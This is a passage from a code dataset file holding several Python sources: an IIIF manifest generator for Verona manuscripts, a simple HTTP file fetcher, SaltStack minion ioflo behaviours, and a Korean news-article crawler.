arabo:\",value=record[\"numerazione_araba\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Titolo secondo don Spagnolo:\",value=record[\"titolo\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Materiale\",value=record[\"materiale\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Numero di fogli\",value=record[\"fogli\"],language_l=\"it\")\n\nif \"-\" in record[\"Spagnolo\"]:\n pagsp = \"pagine %s\" %record[\"Spagnolo\"]\nelse: \n pagsp = \"pagina %s\" %record[\"Spagnolo\"]\n\nmanifest.add_metadata(label=\"Riferimento al catalogo di don Spagnolo\",value=pagsp,language_l=\"it\")\nif record[\"datazione_f\"] != \"\":\n if int(record[\"datazione_f\"][:-2]) - 1 == int(record[\"datazione_i\"][:-2]):\n datazione = \"al %s secolo\" %romconv[int(record[\"datazione_f\"][:-2])]\n else:\n datazione = \"tra i secoli %s e %s\" %(romconv[int(record[\"datazione_f\"][:-2])],romconv[int(record[\"datazione_f\"][:-2])])\nmanifest.add_metadata(label=\"Databile\",value=datazione,language_l=\"it\",language_v=\"it\")\nmanifest.add_metadata(label=\"lingua\",value=record[\"lingua\"],language_l=\"it\")\nif record[\"altezza\"] != \"\" and record[\"ampiezza\"] != \"\":\n dim = \"%s x %s cm\" %(record[\"altezza\"],record[\"ampiezza\"])\n\nmanifest.add_metadata(label=\"Dimensioni\",value=dim,language_l=\"it\")\nmanifest.add_metadata(label=\"Rilegatura:\",value=record[\"rilegatura\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Tipo di rilegatura\",value=record[\"tipo_rilegatura\"],language_l=\"it\")\nmanifest.add_metadata(label=\"Materiale rilegatura\",value=record[\"materiale_rilegatura\"],language_l=\"it\")\n# more complex entry can be mapped directly to a dictionary and inserted using entry arguments\nmanifest.add_summary(f\"Il manoscritto {segn} è databile {datazione} secondo le informazioni riportate nell catalogo di don Spagnolo ({pagsp}). \",language=\"it\")\nmanifest.set_viewingDirection(\"left-to-right\")\nmanifest.add_behavior(\"paged\")\nmanifest.set_navDate(f\"{record['datazione_i']}-01-01T00:00:00Z\")\nmanifest.set_rights(\"http://creativecommons.org/licenses/by/4.0/\")\nmanifest.add_requiredStatement(label=\"Attribution\",value=\"Provided by University of Verona and Biblioteca Capitolare di Verona\",language_l=\"en\",language_v=\"en\")\nprov = manifest.add_provider()\nprov.add_label(\"it\",\"Università di Verona\")\nprov.set_id(\"https://www.univr.it/it/\")\nhomp = prov.add_homepage()\nhomp.set_id(\"https://sites.hss.univr.it/laboratori_integrati/laboratorio-lamedan/\")\nhomp.set_type(\"Text\")\nhomp.add_label(\"en\",\"Laboratorio integrati - LAboratorio di Studi MEdievale e DANteschi\")\nhomp.set_format(\"text/html\")\nlogo = prov.add_logo()\nlogo.set_id(\"https://cdn.univr.it/o/aol-theme/images/logo-univr-colori-80.png\")\nlogo.set_type(\"Image\")\nlogo.set_format(\"image/png\")\n\n\nimages = sorted([image for image in glob.glob(folder+\"/*.jp2\")])\npiatti_e_carte_di_guardia_ant = 4\nfogli = 259\npiatti_e_carte_di_guardia_post = 4\nplabels = ['dorso','piatto anteriore','risguardia anteriore',]\nsidesg1 = cycle(('recto','verso'))\nfor i in range(1,piatti_e_carte_di_guardia_ant+1):\n plabels.append(\"guardia anteriore %i %s\" %(i,next(sidesg1)))\n plabels.append(\"guardia anteriore %i %s\" %(i,next(sidesg1)))\n\nsidesf = cycle(('r','v'))\nfor i in range(1,fogli+1):\n plabels.append(\"%i%s\" %(i,next(sidesf)))\n plabels.append(\"%i%s\" %(i,next(sidesf)))\n\nsidesg2 = cycle(('r','v'))\nfor i in range(1,piatti_e_carte_di_guardia_post+1):\n plabels.append(\"guardia posteriore %i %s\" %(i,next(sidesg2)))\n plabels.append(\"guardia posteriore %i %s\" %(i,next(sidesg2)))\n\npost_elements = ['risguardia posteriore', 'piatto posteriore']\nfor i in post_elements:\n plabels.append(i)\n \nfor idx,d in enumerate(images):\n manloc = \"/manifests/%s\" %segnatura\n image = d\n canvas = manifest.add_canvas_to_items()\n if plabels[idx] in ['dorso','piatto anteriore']:\n canvas.add_behavior(\"paged\")\n canvas.set_id(extendbase_url=[\"manifests\",segnatura,\"canvas\",\"p%s\"%(idx+1)]) # in this case we use the base url\n out = check_output([\"exiftool\", image])\n Metadata = dict((e[:32].strip(),e[33:].strip()) for e in out.decode('utf8').split('\\n'))\n width = Metadata['Image Width']\n height = Metadata['Image Height']\n canvas.set_height(width)\n canvas.set_width(height)\n canvas.add_label(\"it\",plabels[idx])\n annopage = canvas.add_annotationpage_to_items()\n annopage.set_id(extendbase_url=[\"manifests\",segnatura,\"page\",\"p%s\"%(idx+1),\"1\"])\n annotation = annopage.add_annotation_to_items(target=canvas.id)\n annotation.set_id(extendbase_url=[\"manifests\",segnatura,\"annotation\",\"p%s-image\"%str(idx+1).zfill(4)])\n annotation.set_motivation(\"painting\")\n annotation.body.set_id(extendbase_url=[image,\"/full/max/0/default.jpg\"])\n annotation.body.set_type(\"Image\")\n annotation.body.set_format(\"image/jp2\")\n annotation.body.set_width(width)\n annotation.body.set_height(height)\n s = annotation.body.add_service()\n s.set_id(extendbase_url=[image])\n s.set_type(\"ImageService2\")\n s.set_profile(\"level2\")\n \n \nrng = manifest.add_range_to_structures()\nrng.set_id(extendbase_url=\"range/r0\")\nrng.add_label(\"en\",\"Table of Contents\")\nrng2 = iiifpapi3.Range()\nrng2.set_id(extendbase_url=\"range/r1\")\nrng2.add_label(\"en\",\"Introduction\")\nrng2.set_supplementary(\"https://example.org/iiif/book1/annocoll/introTexts\")\nrng2.add_canvas_to_items(\"https://example.org/iiif/book1/canvas/p1\")\nsr = iiifpapi3.SpecificResource()\nsr.set_source(\"https://example.org/iiif/book1/canvas/p2\")\nfs = iiifpapi3.FragmentSelector()\nfs.set_xywh(0,0,750,300)\nsr.set_selector(fs)\nrng2.add_item(sr)\nrng.add_item(rng2)\nannopage3 = iiifpapi3.AnnotationPage()\nannopage3.set_id(\"https://example.org/iiif/book1/page/manifest/1\")\nanno = iiifpapi3.Annotation(manifest.id)\nanno.set_id(\"https://example.org/iiif/book1/page/manifest/a1\")\nanno.set_motivation(\"commenting\")\nanno.body.set_language(\"en\")\nanno.body.set_value(\"I love this manifest!\")\nannopage3.add_item(anno)\nannopage3.set_id(\"https://example.org/iiif/book1/page/manifest/1\") \nmanifest.add_annotation(annopage3)\n\nmanifest.json_save(os.path.join(\"presentationapi\",\"manifests\",\"%s.json\" %segnatura))","sub_path":"examples/Example_Capitolare_server.py","file_name":"Example_Capitolare_server.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"201738479","text":"\"\"\"\n借助http.client,从一台HTTP服务器上通过套接字抓取文件,文件名参数可以是一个完整的目录路径\n也可以通过末尾的?查询参数定制一个CGI脚本,触发一个远程程序,抓取得到的文件数据或远程程序输出可以保存\n到本地文件以便模拟FTP功能,或者使用str.find或者html.parser模块进行解析\n返回的是bytes字符串\n\"\"\"\n\nimport sys, http.client\nshowlines = 6\n\ntry:\n servername, filename = sys.argv[1:] #命令行参数\nexcept:\n servername, filename = \"learning-python.com\", '/index.html' #否则设置默认打开的网页\n\nprint(servername, filename)\nserver = http.client.HTTPConnection(servername) #连接到http站服务器\nserver.putrequest(\"GET\", filename) #发送请求和题头\nserver.putheader(\"Accept\", \"text/html\") #也可以用POST请求\nserver.endheaders() #CGI脚本文件名也可以\nreply = server.getresponse() #读取回复的题头和数据\nif reply.status != 200: #200表示成功,不等于200表示失败\n print(\"Error sending request\", reply.status, reply.reason)\nelse:\n data = reply.readlines() #接收到的数据的文件对象\n reply.close() \n for line in data[:showlines]: #显示前showlines行的数据\n print(line)","sub_path":"C13_http_getfile.py","file_name":"C13_http_getfile.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"402155920","text":"# -*- coding: utf-8 -*-\n'''\nThe behaviors to run the salt minion via ioflo\n'''\n\n# Import python libs\nimport os\nimport logging\nimport sys\nimport types\nimport traceback\nimport multiprocessing\nfrom collections import deque\n\n# Import salt libs\nimport salt.minion\nimport salt.payload\nimport salt.utils\nimport salt.utils.event\nimport salt.daemons.masterapi\nimport salt.utils.schedule\nfrom salt.exceptions import (\n CommandExecutionError, CommandNotFoundError, SaltInvocationError)\nfrom salt.transport.road.raet import yarding\nfrom salt.transport.road.raet import stacking\n\n# Import ioflo libs\nimport ioflo.base.deeding\n\n# Import Third Party Libs\nHAS_PSUTIL = False\ntry:\n import psutil\n HAS_PSUTIL = True\nexcept ImportError:\n pass\n\nHAS_RESOURCE = False\ntry:\n import resource\n HAS_RESOURCE = True\nexcept ImportError:\n pass\nlog = logging.getLogger(__name__)\n\n\nclass RouterMinion(ioflo.base.deeding.Deed): # pylint: disable=W0232\n '''\n Route packaets from raet into minion proessing bins\n '''\n Ioinits = {'opts': '.salt.opts',\n 'udp_stack': '.raet.udp.stack.stack',\n 'uxd_stack': '.salt.uxd.stack.stack',\n 'fun_in': '.salt.net.fun_in',\n }\n\n def postinitio(self):\n '''\n Map opts for convenience\n '''\n self.uxd_stack.value = stacking.StackUxd(\n lanename=self.opts.value['id'],\n yid=0,\n dirpath=self.opts.value['sock_dir'])\n self.fun_in.value = deque()\n\n def action(self):\n '''\n Empty the queues into process management queues\n '''\n # Start on the udp_in:\n # TODO: Route UXD messages\n while self.udp_stack.value.rxMsgs:\n data = self.udp_stack.value.rxMsgs.popleft()\n if data['route']['dst'][2] == 'fun':\n self.fun_in.value.append(data)\n if data['route']['dst'][1] is not None:\n if data['route']['dst'][1] in self.uxd_stack.value.yards:\n self.uxd_stack.value.transmit(data, data['route']['dst'][1])\n self.uxd_stack.value.serviceAll()\n while self.uxd_stack.value.rxMsgs:\n msg = self.uxd_stack.value.rxMsgs.popleft()\n estate = msg['route']['dst'][0]\n if estate is not None:\n if estate != self.opts.value['id']:\n self.udp_stack.value.message(\n msg,\n self.udp_stack.value.eids[estate])\n\n\nclass ModulesLoad(ioflo.base.deeding.Deed): # pylint: disable=W0232\n '''\n Reload the minion modules\n '''\n Ioinits = {'opts_store': '.salt.opts',\n 'grains': '.salt.loader.grains',\n 'modules': '.salt.loader.modules',\n 'returners': '.salt.loader.returners'}\n\n def postinitio(self):\n '''\n Map opts for convenience\n '''\n self.opts = self.opts_store.value\n\n def action(self):\n '''\n Return the functions and the returners loaded up from the loader\n module\n '''\n # if this is a *nix system AND modules_max_memory is set, lets enforce\n # a memory limit on module imports\n # this feature ONLY works on *nix like OSs (resource module doesn't work on windows)\n modules_max_memory = False\n if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:\n log.debug(\n 'modules_max_memory set, enforcing a maximum of {0}'.format(\n self.opts['modules_max_memory'])\n )\n modules_max_memory = True\n old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)\n rss, vms = psutil.Process(os.getpid()).get_memory_info()\n mem_limit = rss + vms + self.opts['modules_max_memory']\n resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))\n elif self.opts.get('modules_max_memory', -1) > 0:\n if not HAS_PSUTIL:\n log.error('Unable to enforce modules_max_memory because psutil is missing')\n if not HAS_RESOURCE:\n log.error('Unable to enforce modules_max_memory because resource is missing')\n\n self.opts['grains'] = salt.loader.grains(self.opts)\n self.grains.value = self.opts['grains']\n self.modules.value = salt.loader.minion_mods(self.opts)\n self.returners.value = salt.loader.returners(self.opts, self.modules.value)\n\n # we're done, reset the limits!\n if modules_max_memory is True:\n resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)\n\n\nclass Schedule(ioflo.base.deeding.Deed): # pylint: disable=W0232\n '''\n Evaluates the scedule\n '''\n Ioinits = {'opts_store': '.salt.opts',\n 'grains': '.salt.grains',\n 'modules': '.salt.loader.modules',\n 'returners': '.salt.loader.returners',\n 'master_ret': '.salt.net.master_out'}\n\n def postinitio(self):\n '''\n Map opts and make the scedule object\n '''\n self.scedule = salt.utils.schedule.Schedule(\n self.opts.value,\n self.modules.value,\n self.returners.value)\n\n def action(self):\n '''\n Eval the schedule\n '''\n self.scedule.eval()\n\n\nclass FunctionNix(ioflo.base.deeding.Deed): # pylint: disable=W0232\n '''\n Execute a function call\n '''\n Ioinits = {'opts_store': '.salt.opts',\n 'grains': '.salt.grains',\n 'modules': '.salt.loader.modules',\n 'returners': '.salt.loader.returners',\n 'fun_ack': '.salt.net.fun_ack',\n 'fun_in': '.salt.net.fun_in',\n 'master_ret': '.salt.net.master_out',\n 'uxd_stack': '.salt.uxd.stack.stack',\n 'executors': '.salt.track.executors'}\n\n def postinitio(self):\n '''\n Map opts for convenience\n '''\n self.opts = self.opts_store.value\n self.matcher = salt.minion.Matcher(\n self.opts,\n self.modules.value)\n self.proc_dir = salt.minion.get_proc_dir(self.opts['cachedir'])\n self.serial = salt.payload.Serial(self.opts)\n self.executors.value = {}\n\n def _return_pub(self, ret):\n '''\n Send the return data back via the uxd socket\n '''\n ret_stack = stacking.StackUxd(\n lanename=self.opts['id'],\n yid=ret['jid'],\n dirpath=self.opts['sock_dir'])\n main_yard = yarding.Yard(\n yid=0,\n prefix=self.opts['id'],\n dirpath=self.opts['sock_dir']\n )\n ret_stack.addRemoteYard(main_yard)\n route = {'src': (self.opts['id'], ret_stack.yard.name, 'jid_ret'),\n 'dst': ('master', None, 'return')}\n msg = {'route': route, 'return': ret}\n ret_stack.transmit(msg, 'yard0')\n ret_stack.serviceAll()\n\n def action(self):\n '''\n Pull the queue for functions to execute\n '''\n if not self.fun_in.value:\n return\n exchange = self.fun_in.value.popleft()\n data = exchange.get('pub')\n # convert top raw strings - take this out once raet is using msgpack\n for key, val in data.items():\n if isinstance(val, basestring):\n data[str(key)] = str(val)\n else:\n data[str(key)] = val\n match = getattr(\n self.matcher,\n '{0}_match'.format(\n data.get('tgt_type', 'glob')\n )\n )(data['tgt'])\n if not match:\n return\n if 'user' in data:\n log.info(\n 'User {0[user]} Executing command {0[fun]} with jid '\n '{0[jid]}'.format(data))\n else:\n log.info(\n 'Executing command {0[fun]} with jid {0[jid]}'.format(data)\n )\n log.debug('Command details {0}'.format(data))\n ex_yard = yarding.Yard(\n yid=data['jid'],\n prefix=self.opts['id'],\n dirpath=self.opts['sock_dir'])\n self.uxd_stack.value.addRemoteYard(ex_yard)\n process = multiprocessing.Process(\n target=self.proc_run,\n kwargs={'exchange': exchange}\n )\n process.start() # Don't join this process! The process daemonizes\n # itself and init will clean it up\n\n def proc_run(self, exchange):\n '''\n Execute the run in a dedicated process\n '''\n data = exchange['pub']\n fn_ = os.path.join(self.proc_dir, data['jid'])\n self.opts['__ex_id'] = data['jid']\n salt.utils.daemonize_if(self.opts)\n sdata = {'pid': os.getpid()}\n sdata.update(data)\n with salt.utils.fopen(fn_, 'w+') as fp_:\n fp_.write(self.serial.dumps(sdata))\n ret = {'success': False}\n function_name = data['fun']\n if function_name in self.modules.value:\n try:\n func = self.modules.value[data['fun']]\n args, kwargs = salt.minion.parse_args_and_kwargs(func, data['arg'], data)\n sys.modules[func.__module__].__context__['retcode'] = 0\n return_data = func(*args, **kwargs)\n if isinstance(return_data, types.GeneratorType):\n ind = 0\n iret = {}\n for single in return_data:\n if isinstance(single, dict) and isinstance(iret, list):\n iret.update(single)\n else:\n if not iret:\n iret = []\n iret.append(single)\n tag = salt.utils.event.tagify(\n [data['jid'], 'prog', self.opts['id'], str(ind)],\n 'job')\n event_data = {'return': single}\n self._fire_master(event_data, tag) # Need to look into this\n ind += 1\n ret['return'] = iret\n else:\n ret['return'] = return_data\n ret['retcode'] = sys.modules[func.__module__].__context__.get(\n 'retcode',\n 0\n )\n ret['success'] = True\n except CommandNotFoundError as exc:\n msg = 'Command required for {0!r} not found'.format(\n function_name\n )\n log.debug(msg, exc_info=True)\n ret['return'] = '{0}: {1}'.format(msg, exc)\n except CommandExecutionError as exc:\n log.error(\n 'A command in {0!r} had a problem: {1}'.format(\n function_name,\n exc\n ),\n exc_info=log.isEnabledFor(logging.DEBUG)\n )\n ret['return'] = 'ERROR: {0}'.format(exc)\n except SaltInvocationError as exc:\n log.error(\n 'Problem executing {0!r}: {1}'.format(\n function_name,\n exc\n ),\n exc_info=log.isEnabledFor(logging.DEBUG)\n )\n ret['return'] = 'ERROR executing {0!r}: {1}'.format(\n function_name, exc\n )\n except TypeError as exc:\n aspec = salt.utils.get_function_argspec(\n self.modules.value[data['fun']]\n )\n msg = ('TypeError encountered executing {0}: {1}. See '\n 'debug log for more info. Possibly a missing '\n 'arguments issue: {2}').format(function_name,\n exc,\n aspec)\n log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))\n ret['return'] = msg\n except Exception:\n msg = 'The minion function caused an exception'\n log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))\n ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())\n else:\n ret['return'] = '{0!r} is not available.'.format(function_name)\n\n ret['jid'] = data['jid']\n ret['fun'] = data['fun']\n ret['fun_args'] = data['arg']\n self._return_pub(ret)\n if data['ret']:\n ret['id'] = self.opts['id']\n for returner in set(data['ret'].split(',')):\n try:\n self.returners.value['{0}.returner'.format(\n returner\n )](ret)\n except Exception as exc:\n log.error(\n 'The return failed for job {0} {1}'.format(\n data['jid'],\n exc\n )\n )\n","sub_path":"salt/daemons/flo/minion.py","file_name":"minion.py","file_ext":"py","file_size_in_byte":13192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"186508966","text":"#news contents crawler\n\nimport sqlite3\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\nfrom bs4 import NavigableString\nfrom urllib.parse import urlparse\nfrom urllib.parse import parse_qs\nimport httputil\nimport io\nimport chardet\nimport pprint\n\n\nconn = sqlite3.connect(\"articles.sqlite3\")\n\ncur = conn.cursor()\ncur.execute(\"SELECT * FROM article_title where (is_downloaded = 0 or is_downloaded is null)\")\n\nnext = True\nfor row in cur.fetchall():\n aid = None\n oid = None\n\n news_url = row[1]\n url_qry = None\n if '?' in row[1] :\n url_qry = parse_qs(row[1].split('?')[1])\n else :\n #parse_qs로 파싱이 안되는 경우\n try:\n params_str = str(row[1]).split('?')[1].split(\"&\")\n except IndexError as e:\n params_str = [str(row[1]).split('/')[-1] ]\n\n if not url_qry is None:\n if not url_qry.get('oid') == None:\n oid = url_qry.get('oid')[0]\n aid = url_qry.get('aid')[0]\n\n news_site = None\n dir_postfix = None\n #네이버 뉴스 링크가 아닌 경우\n if aid == None or oid == None :\n o = urlparse(row[1])\n if o.hostname == 'www.gjdream.com' :\n # 광주드림 뉴스\n news_site = \"gjdream\"\n #http://www.gjdream.com/v2/news/view.html?news_type=201&uid=480802\n dir_postfix=\"gjdream_\" + url_qry.get('news_type')[0] + \"_\" + url_qry.get('uid')[0] + \".news\"\n elif o.hostname == 'news1.kr':\n #뉴스1\n news_site = \"news1\"\n # http://news1.kr/articles/?3023732\n dir_postfix = \"news1_\" + params_str[0] + \".news\"\n elif o.hostname == 'view.asiae.co.kr' or o.hostname == 'www.asiae.co.kr' :\n #아시아경제\n news_site = \"asiae\"\n #http://view.asiae.co.kr/news/view.htm?idxno=2017061813385889015\n #http://www.asiae.co.kr/uhtml/read.jsp?idxno=181892&ion=S1N53&ion2=S2N213\n dir_postfix = news_site + \"_\" + url_qry.get('idxno')[0] + \".news\"\n\n elif o.hostname == 'news.heraldcorp.com':\n # 헤럴드경제\n news_site = \"heraldcorp\"\n # http://news.heraldcorp.com/village/view.php?ud=201706141855012313875_12\n dir_postfix = \"heraldcorp_\" + url_qry.get('ud')[0] + \".news\"\n elif o.hostname == 'www.mt.co.kr':\n # 머니투데이\n news_site = \"mt\"\n # http://www.mt.co.kr/view/mtview.php?type=1&no=2017060815500512576&outlink=1\n dir_postfix = news_site + \"_\" + url_qry.get('no')[0] + \".news\"\n\n elif o.hostname == 'www.newsis.com':\n # 뉴시스\n news_site = \"newsis\"\n # http://www.newsis.com/view/?id=NISX20170615_0000013759&cID=10812&pID=10800\n dir_postfix = news_site + \"_\" + url_qry.get('id')[0] + \".news\"\n\n elif o.hostname == 'www.edaily.co.kr':\n # 이데일리\n news_site = \"edaily\"\n # http://www.edaily.co.kr/news/newspath.asp?newsid=04391926615962048\n if not url_qry.get('newsid') == None :\n dir_postfix = news_site + \"_\" + url_qry.get('newsid')[0] + \".news\"\n #http://www.edaily.co.kr/news/related_article.edy?uid=1175703&mcd=01\n elif not url_qry.get('uid') == None:\n dir_postfix = news_site + \"_\"+ url_qry.get('uid')[0] +\"_\" + url_qry.get('mcd')[0] + \".news\"\n\n elif o.hostname == 'news.mk.co.kr':\n # 매경\n news_site = \"mk\"\n # http://news.mk.co.kr/newsRead.php?&year=2017&no=357698\n dir_postfix = news_site + \"_\" + url_qry.get('year')[0] + \"_\" + url_qry.get('no')[0] + \".news\"\n\n elif o.hostname == 'www.fnnews.com':\n # 파이낸셜뉴스\n news_site = \"fnnews\"\n # http://www.fnnews.com/news/201705312021291702\n dir_postfix = news_site + \"_\" + params_str[0] + \".news\"\n\n elif o.hostname == 'www.hankyung.com':\n # 한국경제\n news_site = \"hankyung\"\n # http://www.hankyung.com/news/app/newsview.php?aid=2017053129361\n dir_postfix = news_site + \"_\" + url_qry.get('aid')[0] + \".news\"\n\n elif o.hostname == 'www.newspim.com':\n # newspim\n news_site = \"newspim\"\n # http://www.newspim.com/sub_view.php?cate1=3&cate2=6&news_id=100534\n if not url_qry is None and not url_qry.get('cate1') is None :\n dir_postfix = news_site + \"_\" + url_qry.get('cate1')[0] +\"_\" + url_qry.get('cate2')[0] + \"_\" + url_qry.get('news_id')[0] + \".news\"\n news_url = \"http://www.newspim.com/news/view/\" + url_qry.get('news_id')[0]\n elif not url_qry is None:\n dir_postfix = news_site + \"_\" + url_qry.get('newsId')[0] + \".news\"\n news_url = \"http://www.newspim.com/news/view/\" + url_qry.get('newsId')[0]\n else:\n # http://www.newspim.com/news/view/20151211000469 형태이므로 url을 수정하지 않는다.\n dir_postfix = news_site + \"_\" + news_url.split('/')[-1] + \".news\"\n\n\n\n\n\n\n elif o.hostname == 'www.etoday.co.kr':\n # etoday\n news_site = \"etoday\"\n # http://www.etoday.co.kr/news/section/newsview.php?TM=news&SM=0404&idxno=308376\n # http://www.etoday.co.kr/news/section/newsview.php?idxno=637504\n if url_qry.get('TM') is None:\n dir_postfix = news_site + \"_\" + url_qry.get('idxno')[0] + \".news\"\n else:\n dir_postfix = news_site + \"_\" + url_qry.get('TM')[0] +\"_\" + url_qry.get('SM')[0] + \"_\" + url_qry.get('idxno')[0] + \".news\"\n\n\n elif o.hostname == 'app.yonhapnews.co.kr':\n # 연합뉴스\n news_site = \"yonhapnews\"\n # http://app.yonhapnews.co.kr/YNA/Basic/SNS/r.aspx?c=AKR20170606076600002&did=1195m\n dir_postfix = news_site + \"_\" + url_qry.get('c')[0] + \".news\"\n\n elif o.hostname == 'biz.chosun.com':\n # 비즈조선\n news_site = \"biz.chosun\"\n # http://biz.chosun.com/site/data/html_dir/2011/07/14/2011071401906.html\n dir_postfix = news_site + \"_\" + row[1].split('html_dir/')[1][:-5].replace('/','_') + \".news\"\n\n elif o.hostname == 'www.ajunews.com':\n # 아주경제\n news_site = \"ajunews\"\n # http://www.ajunews.com/view/20170618121755955\n if not url_qry is None :\n dir_postfix = news_site + \"_\" + url_qry.get(\"newsId\")[0] + \".news\"\n else:\n dir_postfix = news_site + \"_\" + row[1].split('/')[-1] + \".news\"\n\n elif o.hostname == 'www.thebell.co.kr':\n # 더벨\n news_site = \"thebell\"\n # http://www.thebell.co.kr/front/free/contents/article_view.asp?key=201309060100009530000521\n dir_postfix = news_site + \"_\" + url_qry.get(\"key\")[0] + \".news\"\n\n elif o.hostname == 'www.seoulfn.com':\n # 서울파이낸스\n news_site = \"seoulfn\"\n # http://www.seoulfn.com/news/articleView.html?idxno=39351&ion=section4\n dir_postfix = news_site + \"_\" + url_qry.get(\"idxno\")[0] + \".news\"\n\n elif o.hostname == 'www.segye.com':\n # 세계일보\n news_site = \"segye\"\n # http://www.segye.com/Service5/ShellView.asp?TreeID=1052&PCode=0007&DataID=200603011617000176\n dir_postfix = news_site + \"_\" + url_qry.get(\"idxno\")[0] + \".news\"\n\n\n else :\n print(\"Unknown news site. FATAL ERROR ===> %s\" % row[1])\n # 예외는 패스한다.\n continue\n exit(-1)\n else :\n news_site = \"naver\"\n dir_postfix = oid + \"_\" + aid + \".news\"\n\n\n # 파일을 다운로드 합시다!\n print(\"Try downloading %s\" %( dir_postfix ))\n\n # 파일을 다 읽고나서 존재여부를 체크하는것보다 로컬에서 먼저 검색하고나서 체크하는 것이 효율적인듯 하다.\n for root, dirs, files in os.walk(\"articles\"):\n for file in files:\n if str(file) == dir_postfix:\n if os.stat(str(os.path.join(root, file))).st_size > 0 : #파일 사이즈가 0보다 크면\n print(\"File is alread exists : %s \" % str(os.path.join(root, file)))\n print(\"SKIP\")\n qry = \"UPDATE article_title set is_downloaded = 1 where id = %d ;\" % row[0]\n cur.execute(qry)\n conn.commit()\n continue\n\n try:\n res = requests.get(news_url)\n except requests.exceptions.TooManyRedirects as e:\n res = None\n except requests.exceptions.ConnectionError as ce:\n print(\"Connection aborted. : %s\" % news_url)\n continue\n\n\n return_val = 1\n\n if news_site == \"naver\":\n if res.url.startswith('http://sports') : # 스포츠뉴스는 거른다.\n return_val = 2\n else:\n bs = BeautifulSoup(res.text, 'lxml')\n\n if len(bs.select(\"h2.end_tit\")) > 0 :\n # 연예면 기사의 경우 형식이 조금 다르다\n title = bs.select(\"h2.end_tit\")[0].text\n base_dtm = bs.select(\"div#content > div.end_ct > div > div.article_info > span > em\")[0].text.replace('.', '-')\n contents = bs.select(\"div#articeBody\")[0].text\n elif len(bs.select(\"#main_content > div > div > h1.error_title\")) > 0 :\n #news not found\n return_val= 3\n else :\n title = bs.select(\"h3#articleTitle\")[0].text\n base_dtm = bs.select(\"div.sponsor > span.t11\")[0].text\n contents = bs.select(\"div#articleBodyContents\")[0].text\n\n elif news_site == \"gjdream\":\n text = res.text.encode('latin-1').decode('cp949')\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"table > tr > td > font\")[0].text\n base_dtm = bs.select(\"table > tr > td.f5\")[1].text.split(' : ')[1].strip()\n contents = \"\"\n\n for elmnt in bs.select(\"div#content\")[0].contents:\n if type(elmnt) == NavigableString:\n if str(elmnt).strip() != '':\n contents += str(elmnt).strip() + \"\\n\"\n\n elif news_site == \"news1\":\n bs = BeautifulSoup(res.text, 'html.parser')\n try:\n title = bs.select(\"div.title > h2\")[0].text\n lst_base_dtm = bs.select(\"div.info\")[0].contents[-1].strip().split(' ')[0:2]\n base_dtm = lst_base_dtm[0] + \" \" + lst_base_dtm[1]\n contents = \"\"\n\n for elmnt in bs.select(\"div#articles_detail\")[0].contents:\n if type(elmnt) == NavigableString:\n if str(elmnt).strip() != '':\n contents += str(elmnt).strip() + \"\\n\"\n except IndexError as e :\n if not \"http404\" in bs.select(\"img#img\")[0].attrs[\"src\"]:\n #page not found\n continue\n\n\n elif news_site == 'asiae':\n if res.text.startswith(' h1\")[0].text\n #

    최종수정 2017.06.18 13:39\n #기사입력 2017.06.18 13:39

    \n base_dtm = str(bs.select(\"div.area_title > p\")[0].contents[-1]).strip().replace('.','-')\n contents = bs.select(\"div.article > div\")[0].text\n\n elif news_site == 'heraldcorp':\n text = res.text\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"div.view_top_t2 > ul > li > h1\")[0].text\n\n raw_base_dtm = bs.select(\"div.view_top_t2 > ul > li.ellipsis\")[0].contents[0]\n if str(raw_base_dtm).startswith('기사입력 ') :\n raw_base_dtm= str(raw_base_dtm)[5:].strip()\n base_dtm = raw_base_dtm\n\n contents = \"\"\n for elmnt in bs.select(\"#articleText\")[0].contents:\n if type(elmnt) == NavigableString:\n if str(elmnt).strip() != '':\n contents += str(elmnt).strip() + \"\\n\"\n\n elif news_site == 'mt':\n text = res.text.encode('latin-1').decode('cp949')\n bs = BeautifulSoup(text, 'html.parser')\n try:\n title = bs.select(\"div#article > h1\")[0].text\n\n base_dtm = bs.select(\"span.num\")[0].text[2:].replace('.','-')\n contents = bs.select(\"div#textBody\")[0].text\n except IndexError as e:\n #다른 페이지로 이동하게 되는 경우이다. 왜이리 번거롭게 만들어놨냐\n #\n next_url = bs.contents[0].text.split('\"')[1]\n res = requests.get(next_url)\n text = res.text.encode('latin-1').decode('cp949')\n bs = BeautifulSoup(text, 'html.parser')\n title = bs.select(\"div#article > h1\")[0].text\n try:\n base_dtm = bs.select(\"span.date\")[0].text.replace('.','-')\n except IndexError as e2:\n base_dtm = bs.select(\"span.num\")[0].text[2:].replace('.','-')\n contents = bs.select(\"div#textBody\")[0].text\n\n\n elif news_site == 'newsis':\n text = res.text\n bs = BeautifulSoup(text, 'html.parser')\n try:\n title = bs.select(\"div.article_tbx > h1\")[0].text\n\n base_dtm = bs.select(\"div.date\")[0].text[3:]\n contents = bs.select(\"div.article_bx > div.view_text > div#textBody\")[0].text\n except IndexError as e :\n if \"GISA FILE NOT EXISTS\" in bs.select(\"p.mgt18\")[0].text:\n #기사가 삭제됨\n print(\"Article was deleted.\")\n continue\n\n elif news_site == 'edaily':\n text = res.text.encode('latin-1').decode('cp949')\n bs = BeautifulSoup(text, 'html.parser')\n if bs.select('div#viewarea > h4'):\n title = bs.select(\"div#viewarea > h4\")[0].text\n\n base_dtm = bs.select(\"div#viewarea > div.pr > p.newsdate\")[0].text.split('|')[1].replace('.','-').strip()\n contents = 